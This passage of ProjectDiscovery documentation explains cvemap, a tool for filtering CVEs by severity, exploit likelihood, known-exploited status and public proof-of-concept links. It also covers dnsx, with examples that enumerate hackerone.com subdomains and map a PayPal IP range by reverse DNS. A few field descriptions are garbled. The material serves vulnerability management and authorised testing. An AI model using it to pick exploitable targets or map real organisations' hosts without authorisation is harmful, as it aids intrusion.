| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | 26 |
| CVE-2023-42824| 7.8 | HIGH | 0.00062 | ipados | ❌ | 32 |
| CVE-2023-42793| 9.8 | CRITICAL | 0.97264 | teamcity | ✅ | 47 |
```
### List top CVEs on HackerOne
List top CVEs being reported on hackerone platform using `-h1` or `-hackerone` option.
```bash
$ cvemap -h1
```
```markdown
| CVE | CVSS | SEVERITY | RANK | REPORTS | PRODUCT | TEMPLATE | AGE |
|----------------|------|----------|------|---------|----------------------|----------|------|
| CVE-2020-35946 | 5.4 | MEDIUM | 1 | 304 | all_in_one_seo_pack | ❌ | 1038 |
| CVE-2023-4966 | 7.5 | HIGH | 2 | 54 | netscaler_application| ✅ | 26 |
| CVE-2023-22518 | 9.1 | CRITICAL | 3 | 27 | | ✅ | 5 |
| CVE-2017-15277 | 6.5 | MEDIUM | 4 | 1139 | graphicsmagick | ❌ | 2215 |
| CVE-2023-35813 | 9.8 | CRITICAL | 5 | 54 | experience_commerce | ✅ | 141 |
| CVE-2022-38463 | 6.1 | MEDIUM | 6 | 342 | servicenow | ✅ | 439 |
| CVE-2020-11022 | 6.1 | MEDIUM | 7 | 209 | jquery | ❌ | 1285 |
| CVE-2020-11023 | 6.1 | MEDIUM | 8 | 208 | jquery | ❌ | 1285 |
| CVE-2023-38205 | 7.5 | HIGH | 9 | 162 | coldfusion | ✅ | 52 |
| CVE-2019-11358 | 6.1 | MEDIUM | 10 | 214 | jquery | ❌ | 1660 |
```
cvemap provide multiple ways to query cve data i.e by `product`, `vendor`, `severity`, `cpe`, `assignee`, `cvss-score`, `epss-score`, `age` etc, for example:
### List all CVEs for Confluence
List all the cves published for Atlassian Confluence:
```bash
cvemap -product confluence -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|------------|----------|
| CVE-2020-4027 | 4.7 | MEDIUM | 0.00105 | confluence | ❌ |
| CVE-2019-3398 | 8.8 | HIGH | 0.97342 | confluence | ✅ |
| CVE-2019-3396 | 9.8 | CRITICAL | 0.97504 | confluence | ✅ |
| CVE-2019-3395 | 9.8 | CRITICAL | 0.07038 | confluence | ❌ |
| CVE-2019-3394 | 8.8 | HIGH | 0.1885 | confluence | ❌ |
```
As default, cvemap display default / limit fields which can be custizmed and controoled using `-field`/ `-f` option, for example:
```bash
$ cvemap -severity critical -field assignee,vstatus,poc -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | ASSIGNEE | VSTATUS | POC |
|---------------|------|----------|---------|------------------|----------|------------------------|-------------|-------|
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5832 | 9.1 | CRITICAL | 0.00043 | | ❌ | security@huntr.dev | UNCONFIRMED | FALSE |
| CVE-2023-5824 | 9.6 | CRITICAL | 0.00045 | | ❌ | secalert@redhat.com | UNCONFIRMED | FALSE |
| CVE-2023-5820 | 9.6 | CRITICAL | 0.00047 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ | cve@usom.gov.tr | CONFIRMED | FALSE |
```
To list cves with matching threshold like, CVSS score or EPSS Score / Percentile, below options can be used:
```bash
$ cvemap -silent -cs '> 7' -es '> 0.00053' -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|---------------------------------------|----------|
| CVE-2023-5860 | 7.2 | HIGH | 0.00132 | | ❌ |
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ |
| CVE-2023-5804 | 9.8 | CRITICAL | 0.00063 | nipah_virus_testing_management_system | ❌ |
| CVE-2023-5802 | 8.8 | HIGH | 0.00058 | wp_knowledgebase | ❌ |
```
To filter cves to match with specifc conditions like, cves has public poc or template and in the list of kev, belows options can beused:
```bash
$ cvemap -silent -template=false -poc=true -kev=true -l 5 -f poc,kev
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|----------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487 | 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993 | 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
### Return CVE IDs only
To return only CVE IDs, `-lsi` or `-list-id` flag can be used along with existing filter or search of cvemap.
```bash
cvemap -kev -limit 10 -list-id
CVE-2024-21887
CVE-2024-0519
CVE-2023-7101
CVE-2023-7024
CVE-2023-6549
CVE-2023-6548
CVE-2023-6448
CVE-2023-6345
CVE-2023-5631
CVE-2023-5217
```
### JSON Output
```bash
$ echo CVE-2024-21887 | cvemap -json
```
```json
[
{
"cve_id": "CVE-2024-21887",
"cve_description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.",
"severity": "critical",
"cvss_score": 9.1,
"cvss_metrics": {
"cvss30": {
"score": 9.1,
"vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
},
"cvss31": {
"score": 9.1,
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
}
},
"weaknesses": [
{
"cwe_id": "CWE-77",
"cwe_name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')"
}
],
"epss": {
"epss_score": 0.95688,
"epss_percentile": 0.99289
},
"cpe": {
"cpe": "cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"vendor": "ivanti",
"product": "connect_secure"
},
"reference": [
"http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html"
],
"poc": [
{
"url": "https://github.com/tucommenceapousser/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-20T19:15:23Z"
},
{
"url": "https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T08:11:31Z"
},
{
"url": "https://github.com/seajaysec/Ivanti-Connect-Around-Scan",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T02:12:11Z"
},
{
"url": "https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-18T13:25:46Z"
},
{
"url": "https://github.com/TheRedDevil1/Check-Vulns-Script",
"source": "gh-nomi-sec",
"added_at": "2024-01-17T10:29:02Z"
},
{
"url": "https://github.com/Chocapikk/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T20:59:38Z"
},
{
"url": "https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:40:59Z"
},
{
"url": "https://github.com/rxwx/pulse-meter",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:19:52Z"
},
{
"url": "https://github.com/oways/ivanti-CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-14T09:25:56Z"
}
],
"vendor_advisory": "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US",
"is_template": true,
"nuclei_templates": {
"template_path": "http/cves/2024/CVE-2024-21887.yaml",
"template_url": "https://cloud.projectdiscovery.io/public/CVE-2024-21887",
"created_at": "2024-01-17T02:23:45+05:30",
"updated_at": "2024-01-16T21:14:22Z"
},
"is_exploited": true,
"kev": {
"added_date": "2024-01-10",
"due_date": "2024-01-22"
},
"assignee": "support@hackerone.com",
"published_at": "2024-01-12T17:15:10.017",
"updated_at": "2024-01-22T17:15:09.523",
"hackerone": {
"rank": 6345,
"count": 0
},
"age_in_days": 10,
"vuln_status": "modified",
"is_poc": true,
"is_remote": false,
"is_oss": false,
"vulnerable_cpe": [
"cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.6:r1:*:*:*:*:*:*"
]
}
]
```
## Advanced Filters
You can combine filters with a `-q` query to match multiple filters. For example:
```bash
cvemap -q '"remote code execution" 2023 is_remote:true is_poc:true sort_asc:age_in_days'
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|---------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993| 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
You can see the documentation for all available filters below:
### Metadata
Age of the CVE
The assignee for this CVE.
Typically this is an email address such as `security@apache.org` or `cve@mitre.org`
The description of the CVE from the NVD
The CVE ID for a specific CVE such as `CVE-2019-7070`
The CVSS v3.0 score for this CloseEvent. Example: `8.8`
Is the CVE marked as a [Known Exploited Vulnerability (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Is this CVE in open source software with OSS data available?
Is there a Proof of Concept (POC) available for this CVE?
Is this CVE remotely exploitable?
Is there a Nuclei Template available for this CVE?
The URL for the patch for this CVE.
Example: `https://helpx.adobe.com/security/products/acrobat/apsb19-07.html`
The published date and time for this CVE. Example: `2019-05-24T19:29:02.080`
The URL reference for this CVE.
Example: `https://www.zerodayinitiative.com/advisories/ZDI-19-210/`
The CVSS 3.0 severity for this CVE. Example: `severity`
The last date and time that this CVE was updated. Example: `2019-08-21T16:20:31.353`
The URL for the vendor advisory for this CVE.
Example: `vendor_advisory`
The vulnerability status this CVE. Example: `confirmed`
The CPE string for this CVE. Example: `cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:*`
### CPE Data
Common Platform Enumeration (CPE) Data
The full Common Platform Enumeration String. Example:
```
cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*
```
Common Platform Enumeration framework. Example: `wordpress`
Common Platform Enumeration product. Example: `acrobat_dc`
Common Platform Enumeration vendor. Example: `adobe`
### CVSS Data
Common Vulnerability Scoring System (CVSS) Data
CVSS v2 Score. Example: `9.3`
CVSS v2 severity. Example: `critical`
CVSS v2 vector. Example: `CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C`
CVSS v3.0 Score. Example: `8.8`
CVSS v3.0 severity. Example: `high`
CVSS v3.0 vector. Example: `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
CVSS v3.1 Score. Example: `7`
CVSS v3.1 severity. Example: `high`
CVSS v3.1 vector. Example: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
### EPSS Data
Use After FreeExploit Prediction Scoring System (EPSS) Data
The EPSS percentile. Example: `0.80053`
The EPSS score. Example: `0.00826`
### HackerOne Data
Number of hackerone reports for this CVE. Example: `0`
The hackerone rank for this CVE. Example: `6279`
### KVE Data
Known Exploited Vulnerability (KEV) Data
Date added to the KEV. Example `2022-04-15`
The KEV due Date. Example `2022-05-06`
### Nuclei Template Data
Date and time that the Nuclei Template was created. Example `2020-04-05T23:31:09+05:30`
The GitHub issue for this template. Example `https://github.com/projectdiscovery/nuclei-templates/issues/7549`
The GitHub issue type this template - has it been mentioned or is there a template created? Example `mention` or `template`
The full path for this template. Example `http/cves/2019/CVE-2019-12314.yaml`
The GitHub pull request for this template. Example `https://github.com/projectdiscovery/nuclei-templates/pull/3200`
The public ProjectDiscovery Cloud Platform URL for this template. Example `https://cloud.projectdiscovery.io/public/CVE-2019-12314`
Date and time that the Nuclei Template was last updated. Example `2023-12-29T09:30:44Z`
### Open Source Software (OSS) Data
Date and time that the OSS repository was created. Example `2009-05-21 01:33:45 +0000 UTC`
Description for this software. Example `Mirror of Apache ActiveMQ`
The number of forks for this project. Example `1407`
The primary programming language of this software. Example `Java`
Date and time of the most recent push to this repository. Example `2023-12-12 17:51:19 +0000 UTC`
The number of stars for this project. Example `2221`
The number of subscribers for this repository. Example `200`
The topics for this project. Example `php`
Date and time that the project was last updated. Example `2023-12-29 09:29:55 +0000 UTC`
The public repository URL. Example `"https://github.com/apache/activemq`
### Proof of Concept (POC) Data
Date and time that the POC was added. Example `2019-04-02T12:50:46Z`
The source of the POC. Example `trickest`
The URL of the POC. Example `https://medium.com/@alt3kx/a-reflected-xss-in-print-archive-system-v2015-release-2-6-cve-2019-10685-b60763b7768b`
### Shodan Data
Number of Shodan results relative to this CVE. Example `cpe:\"cpe:2.3:a:adobe:coldfusion\"`
The Shodan query for this CVE. Example `trickest`
### CWE Data
Common Weakness Enumeration (CWE) Data
The CWE ID for this CVE. Example `CWE-416`
The CWE name for this CVE. Example `Use After Free`
# cvemap usage
Source: https://docs.projectdiscovery.io/tools/cvemap/usage
Learn cvemap usage including flags and filters
## Access help
Use `cvemap - h` to display all help options.
## cvemap help options
```
Flags:
CONFIG:
-auth configure projectdiscovery cloud (pdcp) api key
OPTIONS:
-id string[] cve to list for given id
-v, -vendor string[] cve to list for given vendor
-p, -product string[] cve to list for given product
-eproduct string[] cves to exclude based on products
-s, -severity string[] cve to list for given severity
-cs, -cvss-score string[] cve to list for given cvss score
-c, -cpe string cve to list for given cpe
-es, -epss-score string cve to list for given epss score
-ep, -epss-percentile string[] cve to list for given epss percentile
-age string cve to list published by given age in days
-a, -assignee string[] cve to list for given publisher assignee
-vs, -vstatus value cve to list for given vulnerability status in cli output. supported: modified, rejected, unknown, new, confirmed, unconfirmed
UPDATE:
-up, -update update cvemap to latest version
-duc, -disable-update-check disable automatic cvemap update check
FILTER:
-q, -search string search in cve data
-k, -kev display cves marked as exploitable vulnerabilities by cisa (default true)
-t, -template display cves that has public nuclei templates (default true)
-poc display cves that has public published poc (default true)
-h1, -hackerone display cves reported on hackerone (default true)
-re, -remote display remotely exploitable cves (AV:N & PR:N | PR:L) (default true)
OUTPUT:
-f, -field value fields to display in cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-fe, -exclude value fields to exclude from cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-lsi, -list-id list only the cve ids in the output
-l, -limit int limit the number of results to display (default 50)
-offset int offset the results to display
-j, -json return output in json format
-epk, -enable-page-keys enable page keys to navigate results
DEBUG:
-version Version
-silent Silent
-verbose Verbose
```
## Notes on usage
* CVE datasets gets updated in every 6 hours.
## References
* **[National Vulnerability Database (NVD)](https://nvd.nist.gov/developers)**: Comprehensive CVE vulnerability data.
* **[Known Exploited Vulnerabilities Catalog (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)**: Exploited vulnerabilities catalog.
* **[Exploit Prediction Scoring System (EPSS)](https://www.first.org/epss/data_stats)**: Exploit prediction scores.
* **[HackerOne](https://hackerone.com/hacktivity/cve_discovery)**: CVE discoveries disclosure.
* **[Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates)**: Vulnerability validation templates.
* **[Live-Hack-CVE](https://github.com/Live-Hack-CVE/) / [PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub/)** GitHub Repository: Vulnerability PoCs references.
# Installing dnsx
Source: https://docs.projectdiscovery.io/tools/dnsx/install
Learn about how to install and get started with dnsx
Enter the command below in a terminal to install ProjectDiscovery's dnsx using Go.
```bash
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
```
```bash
brew install dnsx
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/dnsx:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
```bash
https://github.com/projectdiscovery/dnsx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* dnsx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/dnsx`
# dnsx Overview
Source: https://docs.projectdiscovery.io/tools/dnsx/overview
A fast DNS toolkit for running various probes with multiple features
## What is dnsx?
`dnsx` is a fast and multi-purpose DNS toolkit designed for running various probes through the [retryabledns](https://github.com/projectdiscovery/retryabledns) library.
It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like [shuffledns](https://github.com/projectdiscovery/shuffledns) etc.
## Features and capabilities
* Simple and easy-to-use utility to query DNS records
* **A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA** query support
* DNS **Resolution** / **Brute-force** support
* Custom **resolver** input support
* Multiple resolver format **(TCP/UDP/DOH/DOT)** support
* **stdin** and **stdout** support
* Automatic **wildcard** handling support
## Additional dnsx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
* [https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/](https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/)
* [https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0](https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0)
* [https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/](https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/)
Sharing any external resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
## Support
Questions about using dnsx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running dnsx
Source: https://docs.projectdiscovery.io/tools/dnsx/running
Learn about running dnsx with examples including commands and output
For all of the flags and options available for `dnsx` be sure to check out the [Usage](/tools/dnsx/usage) page. On this page we share examples running 'dnsx' with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### DNS Resolving
Filter active hostnames from the list of passive subdomains, obtained from various sources:
```console
subfinder -silent -d hackerone.com | dnsx -silent
a.ns.hackerone.com
www.hackerone.com
api.hackerone.com
docs.hackerone.com
mta-sts.managed.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
b.ns.hackerone.com
mta-sts.forwarding.hackerone.com
events.hackerone.com
support.hackerone.com
```
Print **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp
www.hackerone.com [104.16.100.52]
www.hackerone.com [104.16.99.52]
hackerone.com [104.16.99.52]
hackerone.com [104.16.100.52]
api.hackerone.com [104.16.99.52]
api.hackerone.com [104.16.100.52]
mta-sts.forwarding.hackerone.com [185.199.108.153]
mta-sts.forwarding.hackerone.com [185.199.109.153]
mta-sts.forwarding.hackerone.com [185.199.110.153]
mta-sts.forwarding.hackerone.com [185.199.111.153]
a.ns.hackerone.com [162.159.0.31]
resources.hackerone.com [52.60.160.16]
resources.hackerone.com [3.98.63.202]
resources.hackerone.com [52.60.165.183]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [185.199.110.153]
mta-sts.hackerone.com [185.199.111.153]
mta-sts.hackerone.com [185.199.109.153]
mta-sts.hackerone.com [185.199.108.153]
gslink.hackerone.com [13.35.210.17]
gslink.hackerone.com [13.35.210.38]
gslink.hackerone.com [13.35.210.83]
gslink.hackerone.com [13.35.210.19]
b.ns.hackerone.com [162.159.1.31]
docs.hackerone.com [185.199.109.153]
docs.hackerone.com [185.199.110.153]
docs.hackerone.com [185.199.111.153]
docs.hackerone.com [185.199.108.153]
support.hackerone.com [104.16.51.111]
support.hackerone.com [104.16.53.111]
mta-sts.managed.hackerone.com [185.199.108.153]
mta-sts.managed.hackerone.com [185.199.109.153]
mta-sts.managed.hackerone.com [185.199.110.153]
mta-sts.managed.hackerone.com [185.199.111.153]
```
Extract **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp-only
104.16.99.52
104.16.100.52
162.159.1.31
104.16.99.52
104.16.100.52
185.199.110.153
185.199.111.153
185.199.108.153
185.199.109.153
104.16.99.52
104.16.100.52
104.16.51.111
104.16.53.111
185.199.108.153
185.199.111.153
185.199.110.153
185.199.111.153
```
Extract **CNAME** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -cname -resp
support.hackerone.com [hackerone.zendesk.com]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [hacker0x01.github.io]
mta-sts.forwarding.hackerone.com [hacker0x01.github.io]
events.hackerone.com [whitelabel.bigmarker.com]
```
Extract **ASN** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -asn
b.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
a.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
hackerone.com [AS13335, CLOUDFLARENET, US]
www.hackerone.com [AS13335, CLOUDFLARENET, US]
api.hackerone.com [AS13335, CLOUDFLARENET, US]
support.hackerone.com [AS13335, CLOUDFLARENET, US]
```
Probe using [dns status code](https://github.com/projectdiscovery/dnsx/wiki/RCODE-ID-VALUE-Mapping) on given list of (sub)domains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -rcode noerror,servfail,refused
ns.hackerone.com [NOERROR]
a.ns.hackerone.com [NOERROR]
b.ns.hackerone.com [NOERROR]
support.hackerone.com [NOERROR]
resources.hackerone.com [NOERROR]
mta-sts.hackerone.com [NOERROR]
www.hackerone.com [NOERROR]
mta-sts.forwarding.hackerone.com [NOERROR]
docs.hackerone.com [NOERROR]
```
Extract subdomains from given network range using `PTR` query:
```console
echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr
cors.api.paypal.com
trinityadminauth.paypal.com
cld-edge-origin-api.paypal.com
appmanagement.paypal.com
svcs.paypal.com
trinitypie-serv.paypal.com
ppn.paypal.com
pointofsale-new.paypal.com
pointofsale.paypal.com
slc-a-origin-pointofsale.paypal.com
fpdbs.paypal.com
```
Extract subdomains from given ASN using `PTR` query:
```console
echo AS17012 | dnsx -silent -resp-only -ptr
apiagw-a.paypal.com
